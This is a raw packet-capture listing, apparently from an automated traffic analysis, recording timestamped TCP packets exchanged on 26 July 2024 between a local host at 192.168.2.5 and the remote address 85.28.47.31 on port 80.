Jul 26, 2024 17:56:15.716526985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716551065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716555119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.716561079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.716595888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.716643095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716660976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716689110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.716706038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717335939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717346907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717355967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717372894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717379093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717395067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717398882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717410088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717430115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717433929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717442989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717457056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717480898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717468023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717505932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717514038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717515945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717525959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717525959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717536926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717540979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717547894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.717570066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.717591047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.718267918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718277931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718286991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718296051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718305111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718306065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.718314886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718324900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718336105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.718348980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718358994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718367100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718369961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.718380928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718389988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.718391895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718394995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.718404055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.718431950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.718453884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.719177008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719187975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719197035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719207048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719216108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719219923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.719224930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719234943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719240904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.719244003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719254017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719263077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719268084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.719273090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719283104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719295025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.719295025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.719319105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.719347000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720058918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720071077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720078945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720133066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720138073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720138073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720145941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720155001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720175982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720179081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720199108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720223904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720231056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720244884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720253944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720273018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720292091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.720720053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720730066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.720768929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.783556938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.783571959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.783581972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.783591986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.783723116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.783829927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.783840895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.783849955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.783973932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.783973932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.806555986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.806585073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.806596041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.806736946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.806747913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.806757927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.806765079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.806765079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.806770086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.806778908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.806802034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.806838036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807028055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807037115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807046890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807059050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807074070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807084084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807089090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807095051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807096004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807105064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807111979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807137012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807162046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807802916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807813883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807821989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807826996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807837009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807847977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807857037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807859898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807867050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807876110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807883024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807885885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807897091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807907104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807917118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807919979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807926893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.807948112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.807970047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.815892935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.815953016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.815985918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816006899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816013098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816050053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816065073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816085100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816114902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816122055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816150904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816155910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816174030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816190958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816216946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816226006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816242933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816260099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816277027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816293001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816319942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816327095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816360950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816368103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816390991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816395044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816411018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816433907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816457033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816467047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816478968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816525936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816529036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816577911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816590071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816611052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816646099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816679001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816710949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816713095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816746950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816746950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816773891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816781998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816804886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816812992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816845894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816847086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816867113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816881895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816895008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816915035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816941023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.816950083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816982031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.816983938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817015886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817044973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817048073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817063093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817081928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817116976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817147017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817147017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817150116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817169905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817183971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817202091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817218065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817240953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817250013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817275047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817285061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817301035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817332029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817334890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817365885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817389965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817400932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817416906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817434072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817460060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817468882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817492962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817502022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817518950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817537069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817553043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817574024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817590952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817605972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817634106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817640066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817656040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817728996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817758083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817763090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817778111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817800045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817828894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817833900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817852974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817871094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817886114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817904949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817919970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817938089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817971945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.817971945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.817986965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818005085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818022013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818038940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818056107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818070889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818094015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818105936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818123102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818137884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818156958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818172932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818198919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818207026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818228960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818240881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818252087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818299055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818789959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818825006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818857908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818859100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818883896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818893909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818903923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818926096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818953037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.818958998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.818972111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.819017887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.870873928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.870918036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.870935917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.871020079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.871037960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.871054888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.871084929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.871160984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.871161938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.871161938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.871161938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.871726990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.890058994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.890089035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.890106916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.890177965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.890228987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.890245914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.890261889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.890341997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.890341997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.890341997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.890506029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.890554905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895400047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895447016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895462990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895479918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895488977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895500898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895534039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895580053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895596981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895612955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895622969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895643950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895665884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895859003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895909071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895909071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895925045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.895953894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.895975113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896049023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896064997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896081924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.896095991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.896096945 CEST	80	49704	85.28.47.31	192.168.2.5
